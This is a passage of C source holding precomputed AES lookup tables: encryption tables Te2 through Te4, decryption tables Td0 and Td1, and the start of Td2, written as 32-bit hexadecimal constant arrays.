0x63422121U, 0x30201010U, 0x1ae5ffffU, 0x0efdf3f3U, 0x6dbfd2d2U, 0x4c81cdcdU, 0x14180c0cU, 0x35261313U, 0x2fc3ececU, 0xe1be5f5fU, 0xa2359797U, 0xcc884444U, 0x392e1717U, 0x5793c4c4U, 0xf255a7a7U, 0x82fc7e7eU, 0x477a3d3dU, 0xacc86464U, 0xe7ba5d5dU, 0x2b321919U, 0x95e67373U, 0xa0c06060U, 0x98198181U, 0xd19e4f4fU, 0x7fa3dcdcU, 0x66442222U, 0x7e542a2aU, 0xab3b9090U, 0x830b8888U, 0xca8c4646U, 0x29c7eeeeU, 0xd36bb8b8U, 0x3c281414U, 0x79a7dedeU, 0xe2bc5e5eU, 0x1d160b0bU, 0x76addbdbU, 0x3bdbe0e0U, 0x56643232U, 0x4e743a3aU, 0x1e140a0aU, 0xdb924949U, 0x0a0c0606U, 0x6c482424U, 0xe4b85c5cU, 0x5d9fc2c2U, 0x6ebdd3d3U, 0xef43acacU, 0xa6c46262U, 0xa8399191U, 0xa4319595U, 0x37d3e4e4U, 0x8bf27979U, 0x32d5e7e7U, 0x438bc8c8U, 0x596e3737U, 0xb7da6d6dU, 0x8c018d8dU, 0x64b1d5d5U, 0xd29c4e4eU, 0xe049a9a9U, 0xb4d86c6cU, 0xfaac5656U, 0x07f3f4f4U, 0x25cfeaeaU, 0xafca6565U, 0x8ef47a7aU, 0xe947aeaeU, 0x18100808U, 0xd56fbabaU, 0x88f07878U, 0x6f4a2525U, 0x725c2e2eU, 0x24381c1cU, 0xf157a6a6U, 0xc773b4b4U, 0x5197c6c6U, 0x23cbe8e8U, 0x7ca1ddddU, 0x9ce87474U, 0x213e1f1fU, 0xdd964b4bU, 0xdc61bdbdU, 0x860d8b8bU, 0x850f8a8aU, 0x90e07070U, 0x427c3e3eU, 0xc471b5b5U, 0xaacc6666U, 0xd8904848U, 0x05060303U, 0x01f7f6f6U, 0x121c0e0eU, 0xa3c26161U, 0x5f6a3535U, 0xf9ae5757U, 0xd069b9b9U, 0x91178686U, 0x5899c1c1U, 0x273a1d1dU, 0xb9279e9eU, 0x38d9e1e1U, 0x13ebf8f8U, 0xb32b9898U, 0x33221111U, 0xbbd26969U, 0x70a9d9d9U, 0x89078e8eU, 0xa7339494U, 0xb62d9b9bU, 0x223c1e1eU, 0x92158787U, 0x20c9e9e9U, 0x4987ceceU, 0xffaa5555U, 0x78502828U, 0x7aa5dfdfU, 0x8f038c8cU, 0xf859a1a1U, 0x80098989U, 0x171a0d0dU, 0xda65bfbfU, 0x31d7e6e6U, 0xc6844242U, 0xb8d06868U, 0xc3824141U, 0xb0299999U, 0x775a2d2dU, 0x111e0f0fU, 0xcb7bb0b0U, 0xfca85454U, 0xd66dbbbbU, 0x3a2c1616U, }; const uint32_t AES_Te2[256] = { 0x63a5c663U, 0x7c84f87cU, 0x7799ee77U, 0x7b8df67bU, 0xf20dfff2U, 0x6bbdd66bU, 0x6fb1de6fU, 0xc55491c5U, 0x30506030U, 0x01030201U, 0x67a9ce67U, 0x2b7d562bU, 0xfe19e7feU, 0xd762b5d7U, 0xabe64dabU, 0x769aec76U, 0xca458fcaU, 0x829d1f82U, 0xc94089c9U, 0x7d87fa7dU, 0xfa15effaU, 0x59ebb259U, 0x47c98e47U, 0xf00bfbf0U, 0xadec41adU, 0xd467b3d4U, 0xa2fd5fa2U, 0xafea45afU, 0x9cbf239cU, 0xa4f753a4U, 0x7296e472U, 0xc05b9bc0U, 0xb7c275b7U, 0xfd1ce1fdU, 0x93ae3d93U, 0x266a4c26U, 0x365a6c36U, 0x3f417e3fU, 0xf702f5f7U, 0xcc4f83ccU, 0x345c6834U, 0xa5f451a5U, 0xe534d1e5U, 0xf108f9f1U, 0x7193e271U, 0xd873abd8U, 0x31536231U, 0x153f2a15U, 0x040c0804U, 0xc75295c7U, 0x23654623U, 0xc35e9dc3U, 0x18283018U, 0x96a13796U, 0x050f0a05U, 0x9ab52f9aU, 0x07090e07U, 0x12362412U, 0x809b1b80U, 0xe23ddfe2U, 0xeb26cdebU, 0x27694e27U, 0xb2cd7fb2U, 0x759fea75U, 0x091b1209U, 0x839e1d83U, 0x2c74582cU, 0x1a2e341aU, 0x1b2d361bU, 0x6eb2dc6eU, 0x5aeeb45aU, 0xa0fb5ba0U, 0x52f6a452U, 0x3b4d763bU, 0xd661b7d6U, 0xb3ce7db3U, 0x297b5229U, 0xe33edde3U, 0x2f715e2fU, 0x84971384U, 0x53f5a653U, 0xd168b9d1U, 0x00000000U, 0xed2cc1edU, 0x20604020U, 0xfc1fe3fcU, 0xb1c879b1U, 0x5bedb65bU, 0x6abed46aU, 0xcb468dcbU, 0xbed967beU, 0x394b7239U, 0x4ade944aU, 0x4cd4984cU, 0x58e8b058U, 0xcf4a85cfU, 0xd06bbbd0U, 0xef2ac5efU, 0xaae54faaU, 0xfb16edfbU, 0x43c58643U, 0x4dd79a4dU, 0x33556633U, 0x85941185U, 0x45cf8a45U, 0xf910e9f9U, 0x02060402U, 0x7f81fe7fU, 0x50f0a050U, 0x3c44783cU, 0x9fba259fU, 0xa8e34ba8U, 0x51f3a251U, 0xa3fe5da3U, 0x40c08040U, 0x8f8a058fU, 0x92ad3f92U, 0x9dbc219dU, 0x38487038U, 0xf504f1f5U, 0xbcdf63bcU, 0xb6c177b6U, 0xda75afdaU, 0x21634221U, 0x10302010U, 0xff1ae5ffU, 0xf30efdf3U, 0xd26dbfd2U, 0xcd4c81cdU, 0x0c14180cU, 0x13352613U, 0xec2fc3ecU, 0x5fe1be5fU, 0x97a23597U, 0x44cc8844U, 0x17392e17U, 0xc45793c4U, 0xa7f255a7U, 0x7e82fc7eU, 0x3d477a3dU, 0x64acc864U, 0x5de7ba5dU, 0x192b3219U, 0x7395e673U, 0x60a0c060U, 0x81981981U, 0x4fd19e4fU, 0xdc7fa3dcU, 0x22664422U, 0x2a7e542aU, 0x90ab3b90U, 0x88830b88U, 0x46ca8c46U, 0xee29c7eeU, 0xb8d36bb8U, 0x143c2814U, 0xde79a7deU, 0x5ee2bc5eU, 0x0b1d160bU, 0xdb76addbU, 0xe03bdbe0U, 0x32566432U, 0x3a4e743aU, 0x0a1e140aU, 0x49db9249U, 0x060a0c06U, 0x246c4824U, 0x5ce4b85cU, 0xc25d9fc2U, 0xd36ebdd3U, 0xacef43acU, 0x62a6c462U, 0x91a83991U, 0x95a43195U, 0xe437d3e4U, 0x798bf279U, 0xe732d5e7U, 0xc8438bc8U, 0x37596e37U, 0x6db7da6dU, 0x8d8c018dU, 0xd564b1d5U, 0x4ed29c4eU, 0xa9e049a9U, 0x6cb4d86cU, 0x56faac56U, 0xf407f3f4U, 0xea25cfeaU, 0x65afca65U, 0x7a8ef47aU, 0xaee947aeU, 0x08181008U, 0xbad56fbaU, 0x7888f078U, 0x256f4a25U, 0x2e725c2eU, 0x1c24381cU, 0xa6f157a6U, 0xb4c773b4U, 0xc65197c6U, 0xe823cbe8U, 0xdd7ca1ddU, 0x749ce874U, 0x1f213e1fU, 0x4bdd964bU, 0xbddc61bdU, 0x8b860d8bU, 0x8a850f8aU, 0x7090e070U, 0x3e427c3eU, 0xb5c471b5U, 0x66aacc66U, 0x48d89048U, 0x03050603U, 0xf601f7f6U, 0x0e121c0eU, 0x61a3c261U, 0x355f6a35U, 0x57f9ae57U, 0xb9d069b9U, 0x86911786U, 0xc15899c1U, 0x1d273a1dU, 0x9eb9279eU, 0xe138d9e1U, 0xf813ebf8U, 0x98b32b98U, 0x11332211U, 0x69bbd269U, 0xd970a9d9U, 0x8e89078eU, 0x94a73394U, 0x9bb62d9bU, 0x1e223c1eU, 0x87921587U, 0xe920c9e9U, 0xce4987ceU, 0x55ffaa55U, 0x28785028U, 0xdf7aa5dfU, 0x8c8f038cU, 0xa1f859a1U, 0x89800989U, 0x0d171a0dU, 0xbfda65bfU, 0xe631d7e6U, 0x42c68442U, 0x68b8d068U, 0x41c38241U, 0x99b02999U, 0x2d775a2dU, 0x0f111e0fU, 0xb0cb7bb0U, 0x54fca854U, 0xbbd66dbbU, 0x163a2c16U, }; const uint32_t AES_Te3[256] = { 0x6363a5c6U, 0x7c7c84f8U, 0x777799eeU, 0x7b7b8df6U, 0xf2f20dffU, 0x6b6bbdd6U, 0x6f6fb1deU, 0xc5c55491U, 0x30305060U, 0x01010302U, 0x6767a9ceU, 0x2b2b7d56U, 0xfefe19e7U, 0xd7d762b5U, 0xababe64dU, 0x76769aecU, 0xcaca458fU, 0x82829d1fU, 0xc9c94089U, 0x7d7d87faU, 0xfafa15efU, 0x5959ebb2U, 0x4747c98eU, 0xf0f00bfbU, 0xadadec41U, 0xd4d467b3U, 0xa2a2fd5fU, 0xafafea45U, 0x9c9cbf23U, 0xa4a4f753U, 0x727296e4U, 0xc0c05b9bU, 0xb7b7c275U, 0xfdfd1ce1U, 0x9393ae3dU, 0x26266a4cU, 0x36365a6cU, 0x3f3f417eU, 0xf7f702f5U, 0xcccc4f83U, 0x34345c68U, 0xa5a5f451U, 0xe5e534d1U, 0xf1f108f9U, 0x717193e2U, 0xd8d873abU, 0x31315362U, 0x15153f2aU, 0x04040c08U, 0xc7c75295U, 0x23236546U, 0xc3c35e9dU, 0x18182830U, 0x9696a137U, 0x05050f0aU, 0x9a9ab52fU, 0x0707090eU, 0x12123624U, 0x80809b1bU, 0xe2e23ddfU, 0xebeb26cdU, 0x2727694eU, 0xb2b2cd7fU, 0x75759feaU, 0x09091b12U, 0x83839e1dU, 0x2c2c7458U, 0x1a1a2e34U, 0x1b1b2d36U, 0x6e6eb2dcU, 0x5a5aeeb4U, 0xa0a0fb5bU, 0x5252f6a4U, 0x3b3b4d76U, 0xd6d661b7U, 0xb3b3ce7dU, 0x29297b52U, 0xe3e33eddU, 0x2f2f715eU, 0x84849713U, 0x5353f5a6U, 0xd1d168b9U, 0x00000000U, 0xeded2cc1U, 0x20206040U, 0xfcfc1fe3U, 0xb1b1c879U, 0x5b5bedb6U, 0x6a6abed4U, 0xcbcb468dU, 0xbebed967U, 0x39394b72U, 0x4a4ade94U, 0x4c4cd498U, 0x5858e8b0U, 0xcfcf4a85U, 0xd0d06bbbU, 0xefef2ac5U, 0xaaaae54fU, 0xfbfb16edU, 0x4343c586U, 0x4d4dd79aU, 0x33335566U, 0x85859411U, 0x4545cf8aU, 0xf9f910e9U, 0x02020604U, 0x7f7f81feU, 0x5050f0a0U, 0x3c3c4478U, 0x9f9fba25U, 0xa8a8e34bU, 0x5151f3a2U, 0xa3a3fe5dU, 0x4040c080U, 0x8f8f8a05U, 0x9292ad3fU, 0x9d9dbc21U, 0x38384870U, 0xf5f504f1U, 0xbcbcdf63U, 0xb6b6c177U, 0xdada75afU, 0x21216342U, 0x10103020U, 0xffff1ae5U, 0xf3f30efdU, 0xd2d26dbfU, 0xcdcd4c81U, 0x0c0c1418U, 0x13133526U, 0xecec2fc3U, 0x5f5fe1beU, 0x9797a235U, 0x4444cc88U, 0x1717392eU, 0xc4c45793U, 0xa7a7f255U, 0x7e7e82fcU, 0x3d3d477aU, 0x6464acc8U, 0x5d5de7baU, 0x19192b32U, 0x737395e6U, 0x6060a0c0U, 0x81819819U, 0x4f4fd19eU, 0xdcdc7fa3U, 0x22226644U, 0x2a2a7e54U, 0x9090ab3bU, 0x8888830bU, 0x4646ca8cU, 0xeeee29c7U, 0xb8b8d36bU, 0x14143c28U, 0xdede79a7U, 0x5e5ee2bcU, 0x0b0b1d16U, 0xdbdb76adU, 0xe0e03bdbU, 0x32325664U, 0x3a3a4e74U, 0x0a0a1e14U, 0x4949db92U, 0x06060a0cU, 0x24246c48U, 0x5c5ce4b8U, 0xc2c25d9fU, 0xd3d36ebdU, 0xacacef43U, 0x6262a6c4U, 0x9191a839U, 0x9595a431U, 0xe4e437d3U, 0x79798bf2U, 0xe7e732d5U, 0xc8c8438bU, 0x3737596eU, 0x6d6db7daU, 0x8d8d8c01U, 0xd5d564b1U, 0x4e4ed29cU, 0xa9a9e049U, 0x6c6cb4d8U, 0x5656faacU, 0xf4f407f3U, 0xeaea25cfU, 0x6565afcaU, 0x7a7a8ef4U, 0xaeaee947U, 0x08081810U, 0xbabad56fU, 0x787888f0U, 0x25256f4aU, 0x2e2e725cU, 0x1c1c2438U, 0xa6a6f157U, 0xb4b4c773U, 0xc6c65197U, 0xe8e823cbU, 0xdddd7ca1U, 0x74749ce8U, 0x1f1f213eU, 0x4b4bdd96U, 0xbdbddc61U, 0x8b8b860dU, 0x8a8a850fU, 0x707090e0U, 0x3e3e427cU, 0xb5b5c471U, 0x6666aaccU, 0x4848d890U, 0x03030506U, 0xf6f601f7U, 0x0e0e121cU, 0x6161a3c2U, 0x35355f6aU, 0x5757f9aeU, 0xb9b9d069U, 0x86869117U, 0xc1c15899U, 0x1d1d273aU, 0x9e9eb927U, 0xe1e138d9U, 0xf8f813ebU, 0x9898b32bU, 0x11113322U, 0x6969bbd2U, 0xd9d970a9U, 0x8e8e8907U, 0x9494a733U, 0x9b9bb62dU, 0x1e1e223cU, 0x87879215U, 0xe9e920c9U, 0xcece4987U, 0x5555ffaaU, 0x28287850U, 0xdfdf7aa5U, 0x8c8c8f03U, 0xa1a1f859U, 0x89898009U, 0x0d0d171aU, 0xbfbfda65U, 0xe6e631d7U, 0x4242c684U, 0x6868b8d0U, 0x4141c382U, 0x9999b029U, 0x2d2d775aU, 0x0f0f111eU, 0xb0b0cb7bU, 0x5454fca8U, 0xbbbbd66dU, 0x16163a2cU, }; const uint32_t AES_Te4[256] = { 0x63636363U, 0x7c7c7c7cU, 0x77777777U, 0x7b7b7b7bU, 0xf2f2f2f2U, 0x6b6b6b6bU, 0x6f6f6f6fU, 0xc5c5c5c5U, 0x30303030U, 0x01010101U, 0x67676767U, 0x2b2b2b2bU, 0xfefefefeU, 0xd7d7d7d7U, 0xababababU, 0x76767676U, 0xcacacacaU, 0x82828282U, 0xc9c9c9c9U, 0x7d7d7d7dU, 0xfafafafaU, 0x59595959U, 0x47474747U, 0xf0f0f0f0U, 0xadadadadU, 0xd4d4d4d4U, 0xa2a2a2a2U, 0xafafafafU, 0x9c9c9c9cU, 0xa4a4a4a4U, 0x72727272U, 0xc0c0c0c0U, 0xb7b7b7b7U, 0xfdfdfdfdU, 0x93939393U, 0x26262626U, 0x36363636U, 0x3f3f3f3fU, 0xf7f7f7f7U, 0xccccccccU, 0x34343434U, 0xa5a5a5a5U, 0xe5e5e5e5U, 0xf1f1f1f1U, 0x71717171U, 0xd8d8d8d8U, 0x31313131U, 0x15151515U, 0x04040404U, 0xc7c7c7c7U, 0x23232323U, 0xc3c3c3c3U, 0x18181818U, 0x96969696U, 0x05050505U, 0x9a9a9a9aU, 0x07070707U, 0x12121212U, 0x80808080U, 0xe2e2e2e2U, 0xebebebebU, 0x27272727U, 0xb2b2b2b2U, 0x75757575U, 0x09090909U, 0x83838383U, 0x2c2c2c2cU, 0x1a1a1a1aU, 0x1b1b1b1bU, 0x6e6e6e6eU, 0x5a5a5a5aU, 0xa0a0a0a0U, 0x52525252U, 0x3b3b3b3bU, 0xd6d6d6d6U, 0xb3b3b3b3U, 0x29292929U, 0xe3e3e3e3U, 0x2f2f2f2fU, 0x84848484U, 0x53535353U, 0xd1d1d1d1U, 0x00000000U, 0xededededU, 0x20202020U, 0xfcfcfcfcU, 0xb1b1b1b1U, 0x5b5b5b5bU, 0x6a6a6a6aU, 0xcbcbcbcbU, 0xbebebebeU, 0x39393939U, 0x4a4a4a4aU, 0x4c4c4c4cU, 0x58585858U, 0xcfcfcfcfU, 0xd0d0d0d0U, 0xefefefefU, 0xaaaaaaaaU, 0xfbfbfbfbU, 0x43434343U, 0x4d4d4d4dU, 0x33333333U, 0x85858585U, 0x45454545U, 0xf9f9f9f9U, 0x02020202U, 0x7f7f7f7fU, 0x50505050U, 0x3c3c3c3cU, 0x9f9f9f9fU, 0xa8a8a8a8U, 0x51515151U, 0xa3a3a3a3U, 0x40404040U, 0x8f8f8f8fU, 0x92929292U, 0x9d9d9d9dU, 0x38383838U, 0xf5f5f5f5U, 0xbcbcbcbcU, 0xb6b6b6b6U, 0xdadadadaU, 0x21212121U, 0x10101010U, 0xffffffffU, 0xf3f3f3f3U, 0xd2d2d2d2U, 0xcdcdcdcdU, 0x0c0c0c0cU, 0x13131313U, 0xececececU, 0x5f5f5f5fU, 0x97979797U, 0x44444444U, 0x17171717U, 0xc4c4c4c4U, 0xa7a7a7a7U, 0x7e7e7e7eU, 0x3d3d3d3dU, 0x64646464U, 0x5d5d5d5dU, 0x19191919U, 0x73737373U, 0x60606060U, 0x81818181U, 0x4f4f4f4fU, 0xdcdcdcdcU, 0x22222222U, 0x2a2a2a2aU, 0x90909090U, 0x88888888U, 0x46464646U, 0xeeeeeeeeU, 0xb8b8b8b8U, 0x14141414U, 0xdedededeU, 0x5e5e5e5eU, 0x0b0b0b0bU, 0xdbdbdbdbU, 0xe0e0e0e0U, 0x32323232U, 0x3a3a3a3aU, 0x0a0a0a0aU, 0x49494949U, 0x06060606U, 0x24242424U, 0x5c5c5c5cU, 0xc2c2c2c2U, 0xd3d3d3d3U, 0xacacacacU, 0x62626262U, 0x91919191U, 0x95959595U, 0xe4e4e4e4U, 0x79797979U, 0xe7e7e7e7U, 0xc8c8c8c8U, 0x37373737U, 0x6d6d6d6dU, 0x8d8d8d8dU, 0xd5d5d5d5U, 0x4e4e4e4eU, 0xa9a9a9a9U, 0x6c6c6c6cU, 0x56565656U, 0xf4f4f4f4U, 0xeaeaeaeaU, 0x65656565U, 0x7a7a7a7aU, 0xaeaeaeaeU, 0x08080808U, 0xbabababaU, 0x78787878U, 0x25252525U, 0x2e2e2e2eU, 0x1c1c1c1cU, 0xa6a6a6a6U, 0xb4b4b4b4U, 0xc6c6c6c6U, 0xe8e8e8e8U, 0xddddddddU, 0x74747474U, 0x1f1f1f1fU, 0x4b4b4b4bU, 0xbdbdbdbdU, 0x8b8b8b8bU, 0x8a8a8a8aU, 0x70707070U, 0x3e3e3e3eU, 0xb5b5b5b5U, 0x66666666U, 0x48484848U, 0x03030303U, 0xf6f6f6f6U, 0x0e0e0e0eU, 0x61616161U, 0x35353535U, 0x57575757U, 0xb9b9b9b9U, 0x86868686U, 0xc1c1c1c1U, 0x1d1d1d1dU, 0x9e9e9e9eU, 0xe1e1e1e1U, 0xf8f8f8f8U, 0x98989898U, 0x11111111U, 0x69696969U, 0xd9d9d9d9U, 0x8e8e8e8eU, 0x94949494U, 0x9b9b9b9bU, 0x1e1e1e1eU, 0x87878787U, 0xe9e9e9e9U, 0xcecececeU, 0x55555555U, 0x28282828U, 0xdfdfdfdfU, 0x8c8c8c8cU, 0xa1a1a1a1U, 0x89898989U, 0x0d0d0d0dU, 0xbfbfbfbfU, 0xe6e6e6e6U, 0x42424242U, 0x68686868U, 0x41414141U, 0x99999999U, 0x2d2d2d2dU, 0x0f0f0f0fU, 0xb0b0b0b0U, 0x54545454U, 0xbbbbbbbbU, 0x16161616U, }; const uint32_t AES_Td0[256] = { 0x51f4a750U, 0x7e416553U, 0x1a17a4c3U, 0x3a275e96U, 0x3bab6bcbU, 0x1f9d45f1U, 0xacfa58abU, 0x4be30393U, 0x2030fa55U, 0xad766df6U, 0x88cc7691U, 0xf5024c25U, 0x4fe5d7fcU, 0xc52acbd7U, 0x26354480U, 0xb562a38fU, 0xdeb15a49U, 0x25ba1b67U, 0x45ea0e98U, 0x5dfec0e1U, 0xc32f7502U, 0x814cf012U, 0x8d4697a3U, 0x6bd3f9c6U, 0x038f5fe7U, 0x15929c95U, 0xbf6d7aebU, 0x955259daU, 0xd4be832dU, 0x587421d3U, 0x49e06929U, 0x8ec9c844U, 0x75c2896aU, 0xf48e7978U, 0x99583e6bU, 0x27b971ddU, 0xbee14fb6U, 0xf088ad17U, 0xc920ac66U, 0x7dce3ab4U, 0x63df4a18U, 0xe51a3182U, 0x97513360U, 0x62537f45U, 0xb16477e0U, 0xbb6bae84U, 0xfe81a01cU, 0xf9082b94U, 0x70486858U, 0x8f45fd19U, 0x94de6c87U, 0x527bf8b7U, 0xab73d323U, 0x724b02e2U, 0xe31f8f57U, 0x6655ab2aU, 0xb2eb2807U, 0x2fb5c203U, 0x86c57b9aU, 0xd33708a5U, 0x302887f2U, 0x23bfa5b2U, 0x02036abaU, 0xed16825cU, 0x8acf1c2bU, 0xa779b492U, 0xf307f2f0U, 0x4e69e2a1U, 0x65daf4cdU, 0x0605bed5U, 0xd134621fU, 0xc4a6fe8aU, 0x342e539dU, 0xa2f355a0U, 0x058ae132U, 0xa4f6eb75U, 0x0b83ec39U, 0x4060efaaU, 0x5e719f06U, 0xbd6e1051U, 0x3e218af9U, 0x96dd063dU, 0xdd3e05aeU, 0x4de6bd46U, 0x91548db5U, 0x71c45d05U, 0x0406d46fU, 0x605015ffU, 0x1998fb24U, 0xd6bde997U, 0x894043ccU, 0x67d99e77U, 0xb0e842bdU, 0x07898b88U, 0xe7195b38U, 0x79c8eedbU, 0xa17c0a47U, 0x7c420fe9U, 0xf8841ec9U, 0x00000000U, 0x09808683U, 0x322bed48U, 0x1e1170acU, 0x6c5a724eU, 0xfd0efffbU, 0x0f853856U, 0x3daed51eU, 0x362d3927U, 0x0a0fd964U, 0x685ca621U, 0x9b5b54d1U, 0x24362e3aU, 0x0c0a67b1U, 0x9357e70fU, 0xb4ee96d2U, 0x1b9b919eU, 0x80c0c54fU, 0x61dc20a2U, 0x5a774b69U, 0x1c121a16U, 0xe293ba0aU, 0xc0a02ae5U, 0x3c22e043U, 0x121b171dU, 0x0e090d0bU, 0xf28bc7adU, 0x2db6a8b9U, 0x141ea9c8U, 0x57f11985U, 0xaf75074cU, 0xee99ddbbU, 0xa37f60fdU, 0xf701269fU, 0x5c72f5bcU, 0x44663bc5U, 0x5bfb7e34U, 0x8b432976U, 0xcb23c6dcU, 0xb6edfc68U, 0xb8e4f163U, 0xd731dccaU, 0x42638510U, 0x13972240U, 0x84c61120U, 0x854a247dU, 0xd2bb3df8U, 0xaef93211U, 0xc729a16dU, 0x1d9e2f4bU, 0xdcb230f3U, 0x0d8652ecU, 0x77c1e3d0U, 0x2bb3166cU, 0xa970b999U, 0x119448faU, 0x47e96422U, 0xa8fc8cc4U, 0xa0f03f1aU, 0x567d2cd8U, 0x223390efU, 0x87494ec7U, 0xd938d1c1U, 0x8ccaa2feU, 0x98d40b36U, 0xa6f581cfU, 0xa57ade28U, 0xdab78e26U, 0x3fadbfa4U, 0x2c3a9de4U, 0x5078920dU, 0x6a5fcc9bU, 0x547e4662U, 0xf68d13c2U, 0x90d8b8e8U, 0x2e39f75eU, 0x82c3aff5U, 0x9f5d80beU, 0x69d0937cU, 0x6fd52da9U, 0xcf2512b3U, 0xc8ac993bU, 0x10187da7U, 0xe89c636eU, 0xdb3bbb7bU, 0xcd267809U, 0x6e5918f4U, 0xec9ab701U, 0x834f9aa8U, 0xe6956e65U, 0xaaffe67eU, 0x21bccf08U, 0xef15e8e6U, 0xbae79bd9U, 0x4a6f36ceU, 0xea9f09d4U, 0x29b07cd6U, 0x31a4b2afU, 0x2a3f2331U, 0xc6a59430U, 0x35a266c0U, 0x744ebc37U, 0xfc82caa6U, 0xe090d0b0U, 0x33a7d815U, 0xf104984aU, 0x41ecdaf7U, 0x7fcd500eU, 0x1791f62fU, 0x764dd68dU, 0x43efb04dU, 0xccaa4d54U, 0xe49604dfU, 0x9ed1b5e3U, 0x4c6a881bU, 0xc12c1fb8U, 0x4665517fU, 0x9d5eea04U, 0x018c355dU, 0xfa877473U, 0xfb0b412eU, 0xb3671d5aU, 0x92dbd252U, 0xe9105633U, 0x6dd64713U, 0x9ad7618cU, 0x37a10c7aU, 0x59f8148eU, 0xeb133c89U, 0xcea927eeU, 0xb761c935U, 0xe11ce5edU, 0x7a47b13cU, 0x9cd2df59U, 0x55f2733fU, 0x1814ce79U, 0x73c737bfU, 0x53f7cdeaU, 0x5ffdaa5bU, 0xdf3d6f14U, 0x7844db86U, 0xcaaff381U, 0xb968c43eU, 0x3824342cU, 0xc2a3405fU, 0x161dc372U, 0xbce2250cU, 0x283c498bU, 0xff0d9541U, 0x39a80171U, 0x080cb3deU, 0xd8b4e49cU, 0x6456c190U, 0x7bcb8461U, 0xd532b670U, 0x486c5c74U, 0xd0b85742U, }; const uint32_t AES_Td1[256] = { 0x5051f4a7U, 0x537e4165U, 0xc31a17a4U, 0x963a275eU, 0xcb3bab6bU, 0xf11f9d45U, 0xabacfa58U, 0x934be303U, 0x552030faU, 0xf6ad766dU, 0x9188cc76U, 0x25f5024cU, 0xfc4fe5d7U, 0xd7c52acbU, 0x80263544U, 0x8fb562a3U, 0x49deb15aU, 0x6725ba1bU, 0x9845ea0eU, 0xe15dfec0U, 0x02c32f75U, 0x12814cf0U, 0xa38d4697U, 0xc66bd3f9U, 0xe7038f5fU, 0x9515929cU, 0xebbf6d7aU, 0xda955259U, 0x2dd4be83U, 0xd3587421U, 0x2949e069U, 0x448ec9c8U, 0x6a75c289U, 0x78f48e79U, 0x6b99583eU, 0xdd27b971U, 0xb6bee14fU, 0x17f088adU, 0x66c920acU, 0xb47dce3aU, 0x1863df4aU, 0x82e51a31U, 0x60975133U, 0x4562537fU, 0xe0b16477U, 0x84bb6baeU, 0x1cfe81a0U, 0x94f9082bU, 0x58704868U, 0x198f45fdU, 0x8794de6cU, 0xb7527bf8U, 0x23ab73d3U, 0xe2724b02U, 0x57e31f8fU, 0x2a6655abU, 0x07b2eb28U, 0x032fb5c2U, 0x9a86c57bU, 0xa5d33708U, 0xf2302887U, 0xb223bfa5U, 0xba02036aU, 0x5ced1682U, 0x2b8acf1cU, 0x92a779b4U, 0xf0f307f2U, 0xa14e69e2U, 0xcd65daf4U, 0xd50605beU, 0x1fd13462U, 0x8ac4a6feU, 0x9d342e53U, 0xa0a2f355U, 0x32058ae1U, 0x75a4f6ebU, 0x390b83ecU, 0xaa4060efU, 0x065e719fU, 0x51bd6e10U, 0xf93e218aU, 0x3d96dd06U, 0xaedd3e05U, 0x464de6bdU, 0xb591548dU, 0x0571c45dU, 0x6f0406d4U, 0xff605015U, 0x241998fbU, 0x97d6bde9U, 0xcc894043U, 0x7767d99eU, 0xbdb0e842U, 0x8807898bU, 0x38e7195bU, 0xdb79c8eeU, 0x47a17c0aU, 0xe97c420fU, 0xc9f8841eU, 0x00000000U, 0x83098086U, 0x48322bedU, 0xac1e1170U, 0x4e6c5a72U, 0xfbfd0effU, 0x560f8538U, 0x1e3daed5U, 0x27362d39U, 0x640a0fd9U, 0x21685ca6U, 0xd19b5b54U, 0x3a24362eU, 0xb10c0a67U, 0x0f9357e7U, 0xd2b4ee96U, 0x9e1b9b91U, 0x4f80c0c5U, 0xa261dc20U, 0x695a774bU, 0x161c121aU, 0x0ae293baU, 0xe5c0a02aU, 0x433c22e0U, 0x1d121b17U, 0x0b0e090dU, 0xadf28bc7U, 0xb92db6a8U, 0xc8141ea9U, 0x8557f119U, 0x4caf7507U, 0xbbee99ddU, 0xfda37f60U, 0x9ff70126U, 0xbc5c72f5U, 0xc544663bU, 0x345bfb7eU, 0x768b4329U, 0xdccb23c6U, 0x68b6edfcU, 0x63b8e4f1U, 0xcad731dcU, 0x10426385U, 0x40139722U, 0x2084c611U, 0x7d854a24U, 0xf8d2bb3dU, 0x11aef932U, 0x6dc729a1U, 0x4b1d9e2fU, 0xf3dcb230U, 0xec0d8652U, 0xd077c1e3U, 0x6c2bb316U, 0x99a970b9U, 0xfa119448U, 0x2247e964U, 0xc4a8fc8cU, 0x1aa0f03fU, 0xd8567d2cU, 0xef223390U, 0xc787494eU, 0xc1d938d1U, 0xfe8ccaa2U, 0x3698d40bU, 0xcfa6f581U, 0x28a57adeU, 0x26dab78eU, 0xa43fadbfU, 0xe42c3a9dU, 0x0d507892U, 0x9b6a5fccU, 0x62547e46U, 0xc2f68d13U, 0xe890d8b8U, 0x5e2e39f7U, 0xf582c3afU, 0xbe9f5d80U, 0x7c69d093U, 0xa96fd52dU, 0xb3cf2512U, 0x3bc8ac99U, 0xa710187dU, 0x6ee89c63U, 0x7bdb3bbbU, 0x09cd2678U, 0xf46e5918U, 0x01ec9ab7U, 0xa8834f9aU, 0x65e6956eU, 0x7eaaffe6U, 0x0821bccfU, 0xe6ef15e8U, 0xd9bae79bU, 0xce4a6f36U, 0xd4ea9f09U, 0xd629b07cU, 0xaf31a4b2U, 0x312a3f23U, 0x30c6a594U, 0xc035a266U, 0x37744ebcU, 0xa6fc82caU, 0xb0e090d0U, 0x1533a7d8U, 0x4af10498U, 0xf741ecdaU, 0x0e7fcd50U, 0x2f1791f6U, 0x8d764dd6U, 0x4d43efb0U, 0x54ccaa4dU, 0xdfe49604U, 0xe39ed1b5U, 0x1b4c6a88U, 0xb8c12c1fU, 0x7f466551U, 0x049d5eeaU, 0x5d018c35U, 0x73fa8774U, 0x2efb0b41U, 0x5ab3671dU, 0x5292dbd2U, 0x33e91056U, 0x136dd647U, 0x8c9ad761U, 0x7a37a10cU, 0x8e59f814U, 0x89eb133cU, 0xeecea927U, 0x35b761c9U, 0xede11ce5U, 0x3c7a47b1U, 0x599cd2dfU, 0x3f55f273U, 0x791814ceU, 0xbf73c737U, 0xea53f7cdU, 0x5b5ffdaaU, 0x14df3d6fU, 0x867844dbU, 0x81caaff3U, 0x3eb968c4U, 0x2c382434U, 0x5fc2a340U, 0x72161dc3U, 0x0cbce225U, 0x8b283c49U, 0x41ff0d95U, 0x7139a801U, 0xde080cb3U, 0x9cd8b4e4U, 0x906456c1U, 0x617bcb84U, 0x70d532b6U, 0x74486c5cU, 0x42d0b857U, }; const uint32_t AES_Td2[256] = { 0xa75051f4U, 0x65537e41U, 0xa4c31a17U, 0x5e963a27U, 